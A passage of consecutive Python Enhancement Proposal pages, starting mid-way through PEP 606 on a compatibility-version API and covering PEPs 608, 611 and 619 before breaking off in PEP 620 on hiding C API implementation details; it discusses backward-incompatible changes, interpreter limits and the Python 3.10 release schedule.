Add 3 functions to the sys module:
sys.set_python_compat_version(version): set the Python
compatibility version. If it has been called previously, use the
minimum of requested versions. Raise an exception if
sys.set_python_min_compat_version(min_version) has been called and
version < min_version.
version must be greater than or equal to (3, 0).
sys.set_python_min_compat_version(min_version): set the
minimum compatibility version. Raise an exception if
sys.set_python_compat_version(old_version) has been called
previously and old_version < min_version.
min_version must be greater than or equal to (3, 0).
sys.get_python_compat_version(): get the Python compatibility
version. Return a tuple of 3 integers.
A version must a tuple of 2 or 3 integers. (major, minor) version
is equivalent to (major, minor, 0).
By default, sys.get_python_compat_version() returns the current
Python version.
For example, to request compatibility with Python 3.8.0:
import collections
sys.set_python_compat_version((3, 8))
# collections.Mapping alias, removed from Python 3.9, is available
# again, even if collections has been imported before calling
# set_python_compat_version().
parent = collections.Mapping
Obviously, calling sys.set_python_compat_version(version) has no
effect on code executed before the call. Use -X
compat_version=VERSION command line option or
PYTHONCOMPATVERSIONVERSION=VERSION environment variable to set the
compatibility version at Python startup.
Command line
Add -X compat_version=VERSION and -X min_compat_version=VERSION
command line options: call respectively
sys.set_python_compat_version() and
sys.set_python_min_compat_version(). VERSION is a version string
with 2 or 3 numbers (major.minor.micro or major.minor). For
example, -X compat_version=3.8 calls
sys.set_python_compat_version((3, 8)).
Add PYTHONCOMPATVERSIONVERSION=VERSION and
PYTHONCOMPATMINVERSION=VERSION=VERSION environment variables: call
respectively sys.set_python_compat_version() and
sys.set_python_min_compat_version(). VERSION is a version
string with the same format as the command line options.
Backwards Compatibility
Introducing the sys.set_python_compat_version() function means that an
application will behave differently depending on the compatibility
version. Moreover, since the version can be decreased multiple times,
the application can behave differently depending on the import order.
Python 3.9 with sys.set_python_compat_version((3, 8)) is not fully
compatible with Python 3.8: the compatibility is only partial.
Security Implications
sys.set_python_compat_version() must not disable security fixes.
Alternatives
Provide a workaround for each incompatible change
An application can work around most incompatible changes which
impacts it.
For example, collections aliases can be added back using:
import collections.abc
collections.Mapping = collections.abc.Mapping
collections.Sequence = collections.abc.Sequence
Handle backward compatibility in the parser
The parser is modified to support multiple versions of the Python
language (grammar).
The current Python parser cannot be easily modified for that. AST and
grammar are hardcoded to a single Python version.
In Python 3.8, compile() has an undocumented
_feature_version to not consider async and await as
keywords.
The latest major language backward incompatible change was Python 3.7
which made async and await real keywords. It seems like Twisted
was the only affected project, and Twisted had a single affected
function (it used a parameter called async).
Handling backward compatibility in the parser seems quite complex, not
only to modify the parser, but also for developers who have to check
which version of the Python language is used.
from __future__ import python38_syntax
Add pythonXY_syntax to the __future__ module. It would enable
backward compatibility with Python X.Y syntax, but only for the current
file.
With this option, there is no need to change
sys.implementation.cache_tag to use a different .pyc filename,
since the parser will always produce the same output for the same input
(except for the optimization level).
For example:
from __future__ import python35_syntax
async = 1
await = 2
Update cache_tag
Modify the parser to use sys.get_python_compat_version() to choose
the version of the Python language.
sys.set_python_compat_version() updates
sys.implementation.cache_tag to include the compatibility version
without the micro version as a suffix. For example, Python 3.9 uses
'cpython-39' by default, but
sys.set_python_compat_version((3, 7, 2)) sets cache_tag to
'cpython-39-37'. Changes to the Python language are now allowed
in micro releases.
One problem is that import asyncio is likely to fail if
sys.set_python_compat_version((3, 6)) has been called previously.
The code of the asyncio module requires async and await to
be real keywords (change done in Python 3.7).
Another problem is that regular users cannot write .pyc files into
system directories, and so cannot create them on demand. It means that
.pyc optimization cannot be used in the backward compatibility mode.
One solution for that is to modify the Python installer and Python
package installers to precompile .pyc files not only for the current
Python version, but also for multiple older Python versions (up to
Python 3.0?).
Each .py file would have 3n .pyc files (3 optimization levels),
where n is the number of supported Python versions. For example, it
means 6 .pyc files, instead of 3, to support Python 3.8 and Python
3.9.
Temporary moratorium on incompatible changes
In 2009, PEP 3003 “Python Language Moratorium” proposed a
temporary moratorium (suspension) of all changes to the Python language
syntax, semantics, and built-ins for Python 3.1 and Python 3.2.
In May 2018, during the PEP 572 discussions, it was also proposed to slow
down Python changes: see the python-dev thread Slow down…
Barry Warsaw’s call on this:
I don’t believe that the way for Python to remain relevant and
useful for the next 10 years is to cease all language evolution.
Who knows what the computing landscape will look like in 5 years,
let alone 10? Something as arbitrary as a 10-year moratorium is
(again, IMHO) a death sentence for the language.
PEP 387
PEP 387 – Backwards Compatibility Policy proposes a process to make
incompatible changes. The main point is the 4th step of the process:
See if there’s any feedback. Users not involved in the original
discussions may comment now after seeing the warning. Perhaps
reconsider.
PEP 497
PEP 497 – A standard mechanism for backward compatibility proposes different
solutions to provide backward compatibility.
Except for the __past__ mechanism idea, PEP 497 does not propose
concrete solutions:
When an incompatible change to core language syntax or semantics is
being made, Python-dev’s policy is to prefer and expect that,
wherever possible, a mechanism for backward compatibility be
considered and provided for future Python versions after the
breaking change is adopted by default, in addition to any mechanisms
proposed for forward compatibility such as new future_statements.
Examples of incompatible changes
Python 3.8
Examples of Python 3.8 incompatible changes:
(During beta phase) PyCode_New() required a new parameter: it
broke all Cython extensions (all projects distributing precompiled
Cython code). This change has been reverted during the 3.8 beta phase
and a new PyCode_NewWithPosOnlyArgs() function was added instead.
types.CodeType requires an additional mandatory parameter.
The CodeType.replace() function was added to help projects to no
longer depend on the exact signature of the CodeType constructor.
C extensions are no longer linked to libpython.
sys.abiflags changed from 'm' to an empty string.
For example, python3.8m program is gone.
The C structure PyInterpreterState was made opaque.
Blender:
https://bugzilla.redhat.com/show_bug.cgi?id=1734980#c6
https://developer.blender.org/D6038
XML attribute order: bpo-34160. Broken projects:
coverage
docutils
pcs
python-glyphsLib
Backward compatibility cannot be added for all these changes. For
example, changes in the C API and in the build system are out of the
scope of this PEP.
See What’s New In Python 3.8: API and Feature Removals
for all changes.
See also the Porting to Python 3.8
section of What’s New In Python 3.8.
Python 3.7
Examples of Python 3.7 incompatible changes:
async and await are now reserved keywords.
Several undocumented internal imports were removed. One example is
that os.errno is no longer available; use import errno
directly instead. Note that such undocumented internal imports may be
removed any time without notice, even in micro version releases.
Unknown escapes consisting of '\' and an ASCII letter in
replacement templates for re.sub() were deprecated in Python 3.5,
and will now cause an error.
The asyncio.windows_utils.socketpair() function has been removed:
it was an alias to socket.socketpair().
asyncio no longer exports the selectors and _overlapped
modules as asyncio.selectors and asyncio._overlapped. Replace
from asyncio import selectors with import selectors.
PEP 479 is enabled for all code in Python 3.7, meaning that
StopIteration exceptions raised directly or indirectly in
coroutines and generators are transformed into RuntimeError
exceptions.
socketserver.ThreadingMixIn.server_close() now waits until all
non-daemon threads complete. Set the new block_on_close class
attribute to False to get the pre-3.7 behaviour.
The struct.Struct.format type is now str instead of
bytes.
repr for datetime.timedelta has changed to include the keyword
arguments in the output.
tracemalloc.Traceback frames are now sorted from oldest to most
recent to be more consistent with traceback.
Adding backward compatibility for most of these changes would be easy.
See also the Porting to Python 3.7
section of What’s New In Python 3.7.
Micro releases
Sometimes, incompatible changes are introduced in micro releases
(micro in major.minor.micro) to fix bugs or security
vulnerabilities. Examples include:
Python 3.7.2, compileall and py_compile module: the
invalidation_mode parameter’s default value is updated to None;
the SOURCE_DATE_EPOCH environment variable no longer
overrides the value of the invalidation_mode argument, and
determines its default value instead.
Python 3.7.1, xml modules: the SAX parser no longer processes
general external entities by default to increase security by default.
Python 3.5.2, os.urandom(): on Linux, if the getrandom()
syscall blocks (the urandom entropy pool is not initialized yet), fall
back on reading /dev/urandom.
Python 3.5.1, sys.setrecursionlimit(): a RecursionError
exception is now raised if the new limit is too low at the current
recursion depth.
Python 3.4.4, ssl.create_default_context(): RC4 was dropped from
the default cipher string.
Python 3.4.3, http.client: HTTPSConnection now performs all
the necessary certificate and hostname checks by default.
Python 3.4.2, email.message: EmailMessage.is_attachment() is
now a method instead of a property, for consistency with
Message.is_multipart().
Python 3.4.1, os.makedirs(name, mode=0o777, exist_ok=False):
Before Python 3.4.1, if exist_ok was True and the directory
existed, makedirs() would still raise an error if mode did not
match the mode of the existing directory. Since this behavior was
impossible to implement safely, it was removed in Python 3.4.1
(bpo-21082).
Examples of changes made in micro releases which are not backward
incompatible:
ssl.OP_NO_TLSv1_3 constant was added to 2.7.15, 3.6.3 and 3.7.0
for backwards compatibility with OpenSSL 1.0.2.
typing.AsyncContextManager was added to Python 3.6.2.
The zipfile module accepts a path-like object since Python 3.6.2.
loop.create_future() was added to Python 3.5.2 in the asyncio
module.
No backward compatibility code is needed for these kinds of changes.
References
Accepted PEPs:
PEP 5 – Guidelines for Language Evolution
PEP 236 – Back to the __future__
PEP 411 – Provisional packages in the Python standard library
PEP 3002 – Procedure for Backwards-Incompatible Changes
Draft PEPs:
PEP 602 – Annual Release Cycle for Python
PEP 605 – A rolling feature release stream for CPython
See also withdrawn PEP 598 – Introducing incremental feature
releases
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 606 – Python Compatibility Version | Standards Track | Add sys.set_python_compat_version(version) to enable partial
compatibility with requested Python version. Add
sys.get_python_compat_version(). |
PEP 608 – Coordinated Python release
Author:
Miro Hrončok <miro at hroncok.cz>,
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Oct-2019
Python-Version:
3.9
Table of Contents
Abstract
Rationale
Too few projects are involved in the Python beta phase
DeprecationWarning is being ignored
Need to coordinate
Shorter Python release schedule
Specification
Limit the delay
Selected projects
How projects are selected
Incompatible changes
Examples
Cleaning up Python and DeprecationWarning
Distributed CI
Copyright
Abstract
Block a Python release until a compatible version of selected projects
is available.
The Python release manager can decide to release Python even if a
project is not compatible, if they decide that the project is going to
be fixed soon enough, or if the issue severity is low enough.
Rationale
The PEP involves maintainers of the selected projects in the Python
release cycle. There are multiple benefit:
Detect more bugs before a Python final release
Discuss and maybe revert incompatible changes before a Python final
release
Increase the number of compatible projects when the new Python final
version is released
Too few projects are involved in the Python beta phase
Currently, Python beta versions are available four months before the
final 3.x.0 release.
Bugs reported during the beta phase can be easily fixed and can block a
release if they are serious enough.
Incompatible changes are discussed during the beta phase: enhance
documentation explaining how to update code, or consider to revert these
changes.
Even if more and more projects are tested on the master branch of Python
in their CI, too many projects of the top 50 PyPI projects are only
compatible with the new Python a few weeks, or even months, after the
final Python release.
DeprecationWarning is being ignored
Python has well defined process to deprecate features. A
DeprecationWarning must be emitted during at least one Python release,
before a feature can be removed.
In practice, DeprecationWarning warnings are ignored for years in major
Python projects. Usually, maintainers explain that there are too many
warnings and so they simply ignore warnings. Moreover, DeprecationWarning
is silent by default (except in the __main__ module: PEP 565).
Even if more and more projects are running their test suite with
warnings treated as errors (-Werror), Python core developers still
have no idea how many projects are broken when a feature is removed.
Need to coordinate
When issues and incompatible changes are discovered and discussed after
the final Python release, it becomes way more complicated and expensive
to fix Python. Once an API is part of an official final release, Python
should provide backward compatibility for the whole 3.x release
lifetime. Some operating systems can be shipped with the buggy final
release and can take several months before being updated.
Too many projects are only updated to the new Python after the final
Python release, which makes this new Python version barely usable to run
large applications when Python is released.
It is proposed to block a Python release until a compatible version of
all selected projects is available.
Shorter Python release schedule
The PEP 602: Annual Release Cycle for Python and the PEP 605: A
rolling feature release stream for CPython would like to release
Python more often to ship new features more quickly.
The problem is that each Python 3.x release breaks many projects.
Coordinated Python releases reduces the number of broken projects and
makes new Python release more usable.
Specification
By default, a Python release is blocked until a compatible version of
all selected projects is available.
Before releasing the final Python version, the Python release manager is
responsible to send a report of the compatibility status of each project
of the selected projects. It is recommended to send such report at
each beta release to see the evolution and detects issues as soon as
possible.
The Python release manager can decide to release Python even if a
project is not compatible, if they decide that the project is going to
be fixed soon enough, or if the issue severity is low enough.
After each Python release, the project list can be updated to remove
projects and add new ones. For example, to remove old unused
dependencies and add new ones. The list can grow if the whole process
doesn’t block Python releases for too long.
Limit the delay
When a build or test issue with the next Python version is reported to a
project, maintainers have one month to answer. With no answer, the
project can be excluded from the list of projects blocking the Python
release.
Multiple projects are already tested on the master branch of Python in a
CI. Problems can be detected very early in a Python release which should
provide enough time to handle them. More CI can be added for projects
which are not tested on the next Python yet.
Once selected projects issues are known, exceptions can be discussed
between the Python release manager and involved project maintainers on a
case-by-case basis. Not all issues deserve to block a Python release.
Selected projects
List of projects blocking a Python release (total: 27):
Projects (13):
aiohttp
cryptography
Cython
Django
numpy
pandas
pip
requests
scipy
Sphinx (needed to build Python)
sqlalchemy
pytest
tox
Direct and indirect dependencies (14):
certifi (needed by urllib3)
cffi (needed by cryptography)
chardet (needed by Sphinx)
colorama (needed by pip)
docutils (needed by Sphinx)
idna (needed by Sphinx and requests)
jinja2 (needed by Sphinx)
MarkupSafe (needed by Sphinx)
psycopg2 (needed by Django)
pycparser (needed by cffi)
setuptools (needed by pip and tons of Python projects)
six (needed by tons of Python projects)
urllib3 (needed by requests)
wheel (needed by pip)
How projects are selected
Projects used by to build Python should be in the list, like Sphinx.
Most popular projects are picked from the most downloaded PyPI projects.
Most of project dependencies are included in the list as well, since a
single incompatible dependency can block a whole project. Some
dependencies are excluded to reduce the list length.
Test dependencies as pytest and tox should be included as well. If a
project cannot be tested, a new version cannot be shipped neither.
The list should be long enough to have a good idea of the cost of
porting a project to the next Python, but small enough to not block a
Python release for too long.
Obviously, projects which are not part of the list also are encouraged
to report issues with the next Python and to have a CI running on the
next Python version.
Incompatible changes
The definition here is large: any Python change which cause an issue
when building or testing a project.
See also the PEP 606: Python Compatibility Version for more examples of
incompatible changes.
Examples
There are different kinds of incompatible changes:
Change in the Python build. For example, Python 3.8 removed 'm'
(which stands for pymalloc) from sys.abiflags which impacts Python
vendors like Linux distributions.
Change in the C extensions build. For example, Python 3.8 no longer
links C extensions to libpython, and Python 3.7 removed
os.errno alias to the errno module.
Removed function. For example, collections aliases to ABC classes
have been removed in Python 3.9.
Changed function signature:
Reject a type which was previously accepted (ex: only accept int,
reject float).
Add a new mandatory parameter.
Convert a positional-or-keyword parameter to positional-only.
Behavior change. For example, Python 3.8 now serializes XML attributes
in their insertion order, rather than sorting them by name.
New warning. Since more and more projects are tested with all warnings
treated as errors, any new warning can cause a project test to fail.
Function removed from the C API.
Structure made opaque in the C API. For example, PyInterpreterState
became opaque in Python 3.8 which broke projects accessing
interp->modules (PyImport_GetModuleDict() should be used
instead).
Cleaning up Python and DeprecationWarning
One of the Zen of Python (PEP 20) motto is:
There should be one– and preferably only one –obvious way to do
it.
When Python evolves, new ways emerge inevitably. DeprecationWarning
are emitted to suggest to use the new way, but many developers ignore
these warnings which are silent by default.
Sometimes, supporting both ways has a minor maintenance cost, but Python
core developers prefer to drop the old way to clean up the Python code
base and standard library. Such kind of change is backward incompatible.
More incompatible changes than usual should be expected with the end of
the Python 2 support which is a good opportunity to cleaning up old
Python code.
Distributed CI
Checking if selected projects are compatible with the master branch
of Python can be automated using a distributed CI.
Existing CIs can be reused.
New CIs can be added for projects which are not tested on the next
Python yet.
It is recommended to treat DeprecationWarning warnings as errors when
testing on the next Python.
A job testing a project on the next Python doesn’t have to be
“mandatory” (block the whole CI). It is fine to have failures during the
beta phase of a Python release. The job only has to pass for the final
Python release.
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 608 – Coordinated Python release | Standards Track | Block a Python release until a compatible version of selected projects
is available. |
PEP 611 – The one million limit
Author:
Mark Shannon <mark at hotpy.org>
Status:
Withdrawn
Type:
Standards Track
Created:
05-Dec-2019
Post-History:
Table of Contents
Abstract
Motivation
Is this a worthwhile trade off?
Rationale
One million
Specification
Recursion depth
Soft and hard limits
Introspecting and modifying the limits
Inferred limits
The advantages for CPython of imposing these limits:
Line of code in a module and code object restrictions.
Total number of classes in a running interpreter
Enforcement
Hard limits in CPython
Backwards Compatibility
Other implementations
General purpose implementations
Special purpose implementations
Security Implications
Reference Implementation
Rejected Ideas
Open Issues
References
Copyright
Abstract
This PR proposes a soft limit of one million (1 000 000), and a larger hard limit
for various aspects of Python code and its implementation.
The Python language does not specify limits for many of its features.
Not having any limit to these values seems to enhance programmer freedom,
at least superficially, but in practice the CPython VM and other Python virtual
machines have implicit limits or are forced to assume that the limits are
astronomical, which is expensive.
This PR lists a number of features which are to have a limit of one million.
For CPython the hard limit will be eight million (8 000 000).
Motivation
There are many values that need to be represented in a virtual machine.
If no limit is specified for these values,
then the representation must either be inefficient or vulnerable to overflow.
The CPython virtual machine represents values like line numbers,
stack offsets and instruction offsets by 32 bit values. This is inefficient, and potentially unsafe.
It is inefficient as actual values rarely need more than a dozen or so bits to represent them.
It is unsafe as malicious or poorly generated code could cause values to exceed 232.
For example, line numbers are represented by 32 bit values internally.
This is inefficient, given that modules almost never exceed a few thousand lines.
Despite being inefficient, it is still vulnerable to overflow as
it is easy for an attacker to created a module with billions of newline characters.
Memory access is usually a limiting factor in the performance of modern CPUs.
Better packing of data structures enhances locality and reduces memory bandwidth,
at a modest increase in ALU usage (for shifting and masking).
Being able to safely store important values in 20 bits would allow memory savings
in several data structures including, but not limited to:
Frame objects
Object headers
Code objects
There is also the potential for a more efficient instruction format, speeding up interpreter dispatch.
Is this a worthwhile trade off?
The downside of any form of limit is that it might potentially make someone’s job harder,
for example, it may be harder to write a code generator that keeps the size of modules to one million lines.
However, it is the author’s opinion, having written many code generators,
that such a limit is extremely unlikely to be a problem in practice.
The upside of these limits is the freedom it grants implementers of runtimes, whether CPython,
PyPy, or any other implementation, to improve performance.
It is the author’s belief, that the potential value of even a 0.1% reduction in the cost
of running Python programs globally will hugely exceed the cost of modifying a handful of code generators.
Rationale
Imposing a limit on values such as lines of code in a module, and the number of local variables,
has significant advantages for ease of implementation and efficiency of virtual machines.
If the limit is sufficiently large, there is no adverse effect on users of the language.
By selecting a fixed but large limit for these values,
it is possible to have both safety and efficiency whilst causing no inconvenience to human programmers
and only very rare problems for code generators.
One million
The value “one million” is very easy to remember.
The one million limit is mostly a limit on human generated code, not runtime sizes.
One million lines in a single module is a ridiculous concentration of code;
the entire Python standard library is about 2/3rd of a million lines, spread over 1600 files.
The Java Virtual Machine (JVM) [1] specifies a limit of 216-1 (65535) for many program
elements similar to those covered here.
This limit enables limited values to fit in 16 bits, which is a very efficient machine representation.
However, this limit is quite easily exceeded in practice by code generators and
the author is aware of existing Python code that already exceeds 216 lines of code.
The hard limit of eight million fits into 23 bits which, although not as convenient for machine representation,
is still reasonably compact.
A limit of eight million is small enough for efficiency advantages (only 23 bits),
but large enough not to impact users (no one has ever written a module that large).
While it is possible that generated code could exceed the limit,
it is easy for a code generator to modify its output to conform.
The author has hit the 64K limit in the JVM on at least two occasions when generating Java code.
The workarounds were relatively straightforward and wouldn’t
have been necessary with a limit of one million bytecodes or lines of code.
Where necessary, the soft limit can increased for those programs that exceed the one million limit.
Having a soft limit of one million provides a warning of problematic code, without causing an error and forcing an immediate fix.
It also allows dynamic optimizers to use more compact formats without inline checks.
Specification
This PR proposes that the following language features and runtime values have a soft limit of one million.
The number of source code lines in a module
The number of bytecode instructions in a code object.
The sum of local variables and stack usage for a code object.
The number of classes in a running interpreter.
The recursion depth of Python code.
It is likely that memory constraints would be a limiting factor before the number of classes reaches one million.
Recursion depth
The recursion depth limit only applies to pure Python code. Code written in a foreign language, such as C,
may consume hardware stack and thus be limited to a recursion depth of a few thousand.
It is expected that implementations will raise an exception should the hardware stack get close to its limit.
For code that mixes Python and C calls, it is most likely that the hardware limit will apply first.
The size of the hardware recursion may vary at runtime and will not be visible.
Soft and hard limits
Implementations should emit a warning whenever a soft limit is exceeded, unless the hard limit has the same value as the soft limit.
When a hard limit is exceeded, then an exception should be raised.
Depending on the implementation, different hard limits might apply. In some cases the hard limit might be below the soft limit.
For example, many micropython ports are unlikely to be able to support such large limits.
Introspecting and modifying the limits
One or more functions will be provided in the sys module to introspect or modify the soft limits at runtime,
but the limits may not be raised above the hard limit.
Inferred limits
These limits are not part of the specification, but a limit of less than one million
can be inferred from the limit on the number of bytecode instructions in a code object.
Because there would be insufficient instructions to load more than
one million constants or use more than one million names.
The number of distinct names in a code object.
The number of constants in a code object.
The advantages for CPython of imposing these limits:
Line of code in a module and code object restrictions.
When compiling source code to bytecode or modifying bytecode for profiling or debugging,
an intermediate form is required. By limiting operands to 23 bits,
instructions can be represented in a compact 64 bit form allowing
very fast passes over the instruction sequence.
Having 23 bit operands (24 bits for relative branches) allows instructions
to fit into 32 bits without needing additional EXTENDED_ARG instructions.
This improves dispatch, as the operand is strictly local to the instruction.
It is unclear whether this would help performance, it is merely an example of what is possible.
The benefit of restricting the number of lines in a module is primarily the implied limit on bytecodes.
It is more important for implementations that it is instructions per code object, not lines per module, that is limited to one million,
but it is much easier to explain a one million line limit. Having a consistent limit of one million is just easier to remember.
It is mostly likely, although not guaranteed, that the line limit will be hit first and thus provide a simpler to understand error message to the developer.
Total number of classes in a running interpreter
This limit has to the potential to reduce the size of object headers considerably.
Currently objects have a two word header, for objects without references
(int, float, str, etc.) or a four word header for objects with references.
By reducing the maximum number of classes, the space for the class reference
can be reduced from 64 bits to fewer than 32 bits allowing a much more compact header.
For example, a super-compact header format might look like this:
struct header {
uint32_t gc_flags:6; /* Needs finalisation, might be part of a cycle, etc. */
uint32_t class_id:26; /* Can be efficiently mapped to address by ensuring suitable alignment of classes */
uint32_t refcount; /* Limited memory or saturating */
}
This format would reduce the size of a Python object without slots, on a 64 bit machine, from 40 to 16 bytes.
Note that there are two ways to use a 32 bit refcount on a 64 bit machine.
One is to limit each sub-interpreter to 32Gb of memory.
The other is to use a saturating reference count, which would be a little bit slower, but allow unlimited memory allocation.
Enforcement
Python implementations are not obliged to enforce the limits.
However, if a limit can be enforced without hurting performance, then it should be.
It is anticipated that CPython will enforce the limits as follows:
The number of source code lines in a module: version 3.9 onward.
The number of bytecode instructions in a code object: 3.9 onward.
The sum of local variables and stack usage for a code object: 3.9 onward.
The number of classes in a running interpreter: probably 3.10 onward, maybe warning in 3.9.
Hard limits in CPython
CPython will enforce a hard limit on all the above values. The value of the hard limit will be 8 million.
It is hypothetically possible that some machine generated code exceeds one or more of the above limits.
The author believes that to be incredibly unlikely and easily fixed by modifying the output stage of the code generator.
We would like to gain the benefit from the above limits for performance as soon as possible.
To that end, CPython will start applying limits from version 3.9 onward.
To ease the transition and minimize breakage, the initial limits will be 16 million, reducing to 8 million in a later version.
Backwards Compatibility
The actual hard limits enforced by CPython will be:
Version
Hard limit
3.9
16 million
3.10 onward
8 million
Given the rarity of code generators that would exceed the one million limits,
and the environments in which they are typically used, it seems reasonable
to start issuing warnings in 3.9 if any limited quantity exceeds one million.
Historically the recursion limit has been set at 1000. To avoid breaking code that implicitly relies on the value being small,
the soft recursion limit will be increased gradually, as follows:
Version
Soft limit
3.9
4 000
3.10
16 000
3.11
64 000
3.12
125 000
3.13
1 million
The hard limit will be set to 8 million immediately.
Other implementations
Implementations of Python other than CPython have different purposes, so different limits might be appropriate.
This is acceptable, provided the limits are clearly documented.
General purpose implementations
General purpose implementations, such as PyPy, should use the one million limit.
If maximum compatibility is a goal, then they should also follow CPython’s behaviour for 3.9 to 3.11.
Special purpose implementations
Special purpose implementations may use lower limits, as long as they are clearly documented.
An implementation designed for embedded systems, for example MicroPython, might impose limits as low as a few thousand.
Security Implications
Minimal. This reduces the attack surface of any Python virtual machine by a small amount.
Reference Implementation
None, as yet. This will be implemented in CPython, once the PEP has been accepted.
Rejected Ideas
Being able to modify the hard limits upwards at compile time was suggested by Tal Einat.
This is rejected as the current limits of 232 have not been an issue, and the practical
advantages of allowing limits between 220 and 232 seem slight compared to the additional
code complexity of supporting such a feature.
Open Issues
None, as yet.
References
[1]
The Java Virtual Machine specification
https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Withdrawn | PEP 611 – The one million limit | Standards Track | This PR proposes a soft limit of one million (1 000 000), and a larger hard limit
for various aspects of Python code and its implementation. |
PEP 619 – Python 3.10 Release Schedule
Author:
Pablo Galindo Salgado <pablogsal at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
25-May-2020
Python-Version:
3.10
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.10.0 schedule
Bugfix releases
Source-only security fix releases
3.10 Lifespan
Features for 3.10
Copyright
Abstract
This document describes the development and release schedule for
Python 3.10. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.10 Release Manager: Pablo Galindo Salgado
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.10.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.10 development begins: Monday, 2020-05-18
3.10.0 alpha 1: Monday, 2020-10-05
3.10.0 alpha 2: Tuesday, 2020-11-03
3.10.0 alpha 3: Monday, 2020-12-07
3.10.0 alpha 4: Monday, 2021-01-04
3.10.0 alpha 5: Wednesday, 2021-02-03
3.10.0 alpha 6: Monday, 2021-03-01
3.10.0 alpha 7: Tuesday, 2021-04-06
3.10.0 beta 1: Monday, 2021-05-03
(No new features beyond this point.)
3.10.0 beta 2: Monday, 2021-05-31
3.10.0 beta 3: Thursday, 2021-06-17
3.10.0 beta 4: Saturday, 2021-07-10
3.10.0 candidate 1: Tuesday, 2021-08-03
3.10.0 candidate 2: Tuesday, 2021-09-07
3.10.0 final: Monday, 2021-10-04
Bugfix releases
Actual:
3.10.1: Monday, 2021-12-06
3.10.2: Friday, 2022-01-14
3.10.3: Wednesday, 2022-03-16
3.10.4: Thursday, 2022-03-24
3.10.5: Monday, 2022-06-06
3.10.6: Tuesday, 2022-08-02
3.10.7: Tuesday, 2022-09-06
3.10.8: Tuesday, 2022-10-11
3.10.9: Tuesday, 2022-12-06
3.10.10: Wednesday, 2023-02-08
3.10.11: Wednesday, 2023-04-05 (final regular bugfix release with binary
installers)
Source-only security fix releases
Provided irregularly on an “as-needed” basis until October 2026.
3.10.12: Tuesday, 2023-06-06
3.10.13: Thursday, 2023-08-24
3.10 Lifespan
3.10 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.11.0 final,
the 11th and final 3.10 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.10 final, so until approximately
October 2026.
Features for 3.10
Some of the notable features of Python 3.10 include:
PEP 604, Allow writing union types as X | Y
PEP 612, Parameter Specification Variables
PEP 613, Explicit Type Aliases
PEP 618, Add Optional Length-Checking To zip
PEP 626, Precise line numbers for debugging and other tools
PEP 634, PEP 635, PEP 636, Structural Pattern Matching
PEP 644, Require OpenSSL 1.1.1 or newer
PEP 624, Remove Py_UNICODE encoder APIs
PEP 597, Add optional EncodingWarning
Copyright
This document has been placed in the public domain.
| Active | PEP 619 – Python 3.10 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.10. The schedule primarily concerns itself with PEP-sized
items. |
PEP 620 – Hide implementation details from the C API
Author:
Victor Stinner <vstinner at python.org>
Status:
Withdrawn
Type:
Standards Track
Created:
19-Jun-2020
Python-Version:
3.12
Table of Contents
Abstract
PEP withdrawn
Motivation
The C API blocks CPython evolutions
Same CPython design since 1990: structures and reference counting
Why is PyPy more efficient than CPython?
PyPy bottleneck: the Python C API
Rationale
Hide implementation details
Relationship with the limited C API
Specification
Summary
Reorganize the C API header files
Move private functions to the internal C API
Convert macros to static inline functions
Make structures opaque
Disallow using Py_TYPE() as l-value
New C API functions must not return borrowed references
Avoid functions returning PyObject**
New pythoncapi_compat.h header file
Process to reduce the number of broken C extensions
Version History
Copyright
Abstract
Introduce C API incompatible changes to hide implementation details.
Once most implementation details will be hidden, evolution of CPython
internals would be less limited by C API backward compatibility issues.
It will be way easier to add new features.
It becomes possible to experiment with more advanced optimizations in
CPython than just micro-optimizations, like tagged pointers.
Define a process to reduce the number of broken C extensions.
The implementation of this PEP is expected to be done carefully over
multiple Python versions. It already started in Python 3.7 and most
changes are already completed. The Process to reduce the number of
broken C extensions dictates the rhythm.
PEP withdrawn
This PEP was withdrawn by its author since the scope is too broad and the work is
distributed over multiple Python versions, which makes it difficult to make
a decision on the overall PEP. It was split into new PEPs with
narrower and better defined scopes, like PEP 670.
Motivation
The C API blocks CPython evolutions
Adding or removing members of C structures is causing multiple backward
compatibility issues.
Adding a new member breaks the stable ABI (PEP 384), especially for
types declared statically (e.g. static PyTypeObject MyType =
{...};). In Python 3.4, the PEP 442 “Safe object finalization” added
the tp_finalize member at the end of the PyTypeObject structure.
For ABI backward compatibility, a new Py_TPFLAGS_HAVE_FINALIZE type
flag was required to announce if the type structure contains the
tp_finalize member. The flag was removed in Python 3.8 (bpo-32388).
The PyTypeObject.tp_print member, deprecated since Python 3.0
released in 2009, has been removed in the Python 3.8 development cycle.
But the change broke too many C extensions and had to be reverted before
3.8 final release. Finally, the member was removed again in Python 3.9.
C extensions rely on the ability to access structure members,
indirectly through the C API, or even directly. Modifying structures
like PyListObject cannot be even considered.
The PyTypeObject structure is the one which evolved the most, simply
because there was no other way to evolve CPython than modifying it.
A C extension can technically dereference a PyObject* pointer and
access PyObject members. This prevents experiments like tagged
pointers (storing small values as PyObject* which does not point to
a valid PyObject structure).
Replacing Python garbage collector with a tracing garbage collector
would also need to remove PyObject.ob_refcnt reference counter,
whereas currently Py_INCREF() and Py_DECREF() macros access
directly to PyObject.ob_refcnt.
Same CPython design since 1990: structures and reference counting
When the CPython project was created, it was written with one principle:
keep the implementation simple enough so it can be maintained by a
single developer. CPython complexity grew a lot and many
micro-optimizations have been implemented, but CPython core design has
not changed.
Members of PyObject and PyTupleObject structures have not
changed since the “Initial revision” commit (1990):
#define OB_HEAD \
unsigned int ob_refcnt; \
struct _typeobject *ob_type;
typedef struct _object {
OB_HEAD
} object;
typedef struct {
OB_VARHEAD
object *ob_item[1];
} tupleobject;
Only names changed: object was renamed to PyObject and
tupleobject was renamed to PyTupleObject.
